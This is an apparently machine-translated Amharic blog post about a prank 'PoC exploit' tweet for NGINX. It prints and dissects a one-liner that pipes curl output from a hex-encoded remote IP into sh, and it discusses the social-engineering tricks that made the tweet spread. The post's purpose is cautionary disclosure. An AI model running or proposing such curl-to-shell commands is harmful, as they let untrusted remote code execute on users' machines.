ማስታወሻ. ትርጉም:
TL;DR: በማንኛውም ሁኔታ የፋይል ቧንቧዎችን በ sh ወይም bash አይጠቀሙ። ይህ የኮምፒተርዎን ቁጥጥር ለማጣት ጥሩ መንገድ ነው።
በሜይ 31 ስለተፈጠረው የኮሚክ PoC ብዝበዛ አጭር ታሪክ ላካፍላችሁ እፈልጋለሁ። ከ ዜና ምላሽ ወዲያውኑ ታየ
አዲስ የድብደባ ቴክኒኮችን በኩርባ ሰርቼ እንደጨረስኩ የመጀመሪያውን ትዊት ጠቅሼ "የሚሰራ ፖሲ ፈስሷል" የተገኘውን ተጋላጭነት ይጠቀማል ተብሎ የሚገመተውን ነጠላ መስመር የያዘ ኮድ። በእርግጥ ይህ ሙሉ በሙሉ ከንቱ ነበር። ወዲያው እንደምገለጥ ገምቼ ነበር፣ እና በጥሩ ሁኔታ ሁለት ድጋሚ ትዊቶችን አገኛለሁ (ኦህ ጥሩ)።
ሆኖም ቀጥሎ ምን እንደተፈጠረ መገመት አልቻልኩም። የትዊቴ ተወዳጅነት ከፍ ብሏል። የሚገርመው, በአሁኑ ጊዜ (15:00 ሞስኮ ሰዓት ሰኔ 1) ጥቂት ሰዎች ይህ የውሸት መሆኑን ተገንዝበዋል. ብዙ ሰዎች ምንም ሳያረጋግጡ እንደገና ትዊት ያደርጋሉ (የሚያወጣውን ተወዳጅ ASCII ግራፊክስ ማድነቅ ይቅርና)።
ምን ያህል ቆንጆ እንደሆነ ብቻ ተመልከት!
እነዚህ ሁሉ ቀለበቶች እና ቀለሞች በጣም ጥሩ ቢሆኑም ሰዎች እነሱን ለማየት በማሽኑ ላይ ኮድ ማስኬድ እንደነበረባቸው ግልጽ ነው። እንደ እድል ሆኖ, አሳሾች በተመሳሳይ መንገድ ይሰራሉ, እና በእውነቱ ህጋዊ ችግር ውስጥ መግባት ከማልፈልግ እውነታ ጋር ተዳምሮ, በጣቢያዬ ውስጥ የተቀበረው ኮድ ምንም ተጨማሪ ኮድ ለመጫን ወይም ለማስፈጸም ሳልሞክር የማሚ ጥሪዎችን ማድረግ ብቻ ነበር.
ትንሽ መረበሽ;
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
ሶሺዮ-ኤሌክትሮኒካዊ ምህንድስና (SEE) - ከማስገር በላይ
ደህንነት እና መተዋወቅ የዚህ ሙከራ ዋና አካል ነበሩ። ለስኬቱ ያበቁት እነሱ ናቸው ብዬ አስባለሁ። የትእዛዝ መስመሩ "127.0.0.1" (ታዋቂውን የአካባቢ አስተናጋጅ) በመጥቀስ ደህንነትን በግልፅ አሳይቷል። Localhost ደህንነቱ የተጠበቀ እንደሆነ ይቆጠራል እና በእሱ ላይ ያለው ውሂብ በጭራሽ ኮምፒተርዎን አይተዉም.
መተዋወቅ የሙከራው ሁለተኛው የ SEE አካል ነበር። የታለመላቸው ታዳሚዎች በዋናነት የኮምፒዩተር ደህንነትን መሰረታዊ ነገሮች የሚያውቁ ሰዎችን ያቀፈ በመሆኑ፣ ክፍሎቹ የተለመዱ እና የተለመዱ (ስለዚህም አስተማማኝ) እንዲመስሉ ኮድ መፍጠር አስፈላጊ ነበር። የድሮ ብዝበዛ ጽንሰ-ሀሳቦችን መበደር እና እነሱን ባልተለመደ መንገድ ማዋሃድ በጣም ስኬታማ ሆኖ ተገኝቷል።
ከታች ያለው የአንድ መስመር ዝርዝር ትንታኔ ነው. በዚህ ዝርዝር ውስጥ ያሉት ሁሉም ነገሮች ይለብሳሉ የመዋቢያ ተፈጥሮ, እና በተግባር ለትክክለኛው አሠራሩ ምንም ነገር አያስፈልግም.
ምን ክፍሎች በእርግጥ አስፈላጊ ናቸው? ይህ -gsS
, -O 0x0238f06a
, |sh
እና የድር አገልጋይ ራሱ። የድር አገልጋዩ ምንም አይነት ተንኮል አዘል መመሪያዎችን አልያዘም፣ ነገር ግን በቀላሉ ትዕዛዞችን በመጠቀም ASCII ግራፊክስን አገልግሏል። echo
ውስጥ ባለው ስክሪፕት ውስጥ index.html
. ተጠቃሚው መስመር ሲገባ |sh
መሃል ላይ, index.html
ተጭኗል እና ተፈጽሟል. እንደ እድል ሆኖ፣ የድር አገልጋይ ጠባቂዎች ምንም መጥፎ ዓላማ አልነበራቸውም።
-
../../../%00
- ከማውጫው በላይ መሄድን ይወክላል; -
ngx_stream_module.so
- ወደ የዘፈቀደ የ NGINX ሞጁል መንገድ; -
/bin/sh%00<'protocol:TCP'
- እየጀመርን ነው ተብሎ ይጠበቃል/bin/sh
በታለመው ማሽን ላይ እና ውጤቱን ወደ TCP ሰርጥ ማዞር; -
-O 0x0238f06a#PLToffset
- ሚስጥራዊ ንጥረ ነገር ፣ ተጨማሪ#PLToffset
, በሆነ መንገድ በ PLT ውስጥ የተካተተ የማስታወሻ ማካካሻ ለመምሰል; -
|sh;
- ሌላ አስፈላጊ ቁራጭ. ከሚገኘው አጥቂ የድር አገልጋይ የሚመጣውን ኮድ ለማስፈጸም ውጤቱን ወደ sh/bash ማዞር ያስፈልገናል0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- netcat የሚያመለክተው ዱሚ/dev/tcp/localhost
ሁሉም ነገር ደህንነቱ የተጠበቀ እንዲሆን እንደገና። በእውነቱ, ምንም አያደርግም እና በውበት መስመር ውስጥ ተካትቷል.
ይህ የአንድ መስመር ስክሪፕት ዲኮዲንግ እና ስለ "ማህበራዊ-ኤሌክትሮኒካዊ ምህንድስና" (ውስብስብ አስጋሪ) ገጽታዎች ውይይት ያበቃል.
የድር አገልጋይ ውቅር እና የመከላከያ እርምጃዎች
አብዛኛዎቹ የእኔ ተመዝጋቢዎች ኢንፎሴክ/ሰርጎ ገቦች ስለሆኑ፣ ወንዶቹ የሚያደርጉት ነገር እንዲኖራቸው የድረ-ገጽ አገልጋዩ በበኩሉ የ“ፍላጎት” መግለጫዎችን በጥቂቱ እንዲቋቋም ለማድረግ ወሰንኩ። አዘገጃጀት). ሙከራው አሁንም ስለሚቀጥል ሁሉንም ወጥመዶች እዚህ አልዘረዝርም፣ ነገር ግን አገልጋዩ የሚያደርጋቸው ጥቂት ነገሮች እነሆ፡-
- በተወሰኑ ማህበራዊ አውታረ መረቦች ላይ የማሰራጨት ሙከራዎችን በንቃት ይከታተላል እና ተጠቃሚው አገናኙን ጠቅ እንዲያደርግ ለማበረታታት የተለያዩ ቅድመ እይታ ድንክዬዎችን ይተካል።
- የሼል ስክሪፕቱን ከማሳየት ይልቅ Chrome/Mozilla/Safari/ወዘተ ወደ Thugcrowd የማስተዋወቂያ ቪዲዮ ያዞራል።
- ግልጽ የሆኑ የመጥለፍ/የግል ጠለፋ ምልክቶችን ይመለከታል፣ እና ጥያቄዎችን ወደ NSA አገልጋዮች (ሃ!) ማዞር ይጀምራል።
- ተጠቃሚዎቻቸው አስተናጋጁን ከመደበኛው አሳሽ በሚጎበኙ ሁሉም ኮምፒውተሮች ላይ ትሮጃን እና እንዲሁም ባዮስ ሩትኪት ይጭናል (እየቀለድ ነው!)።
አንቲሜርሶች ትንሽ ክፍል
በዚህ ሁኔታ ፣ የእኔ ብቸኛ ግቤ አንዳንድ የ Apache ባህሪዎችን ማወቅ ነበር - በተለይም ፣ ጥያቄዎችን ለማዛወር ጥሩ ህጎች - እና እኔ አሰብኩ-ለምን አይሆንም?
NGINX ብዝበዛ (እውነተኛ!)
ይመዝገቡ
ምንጭ: hab.com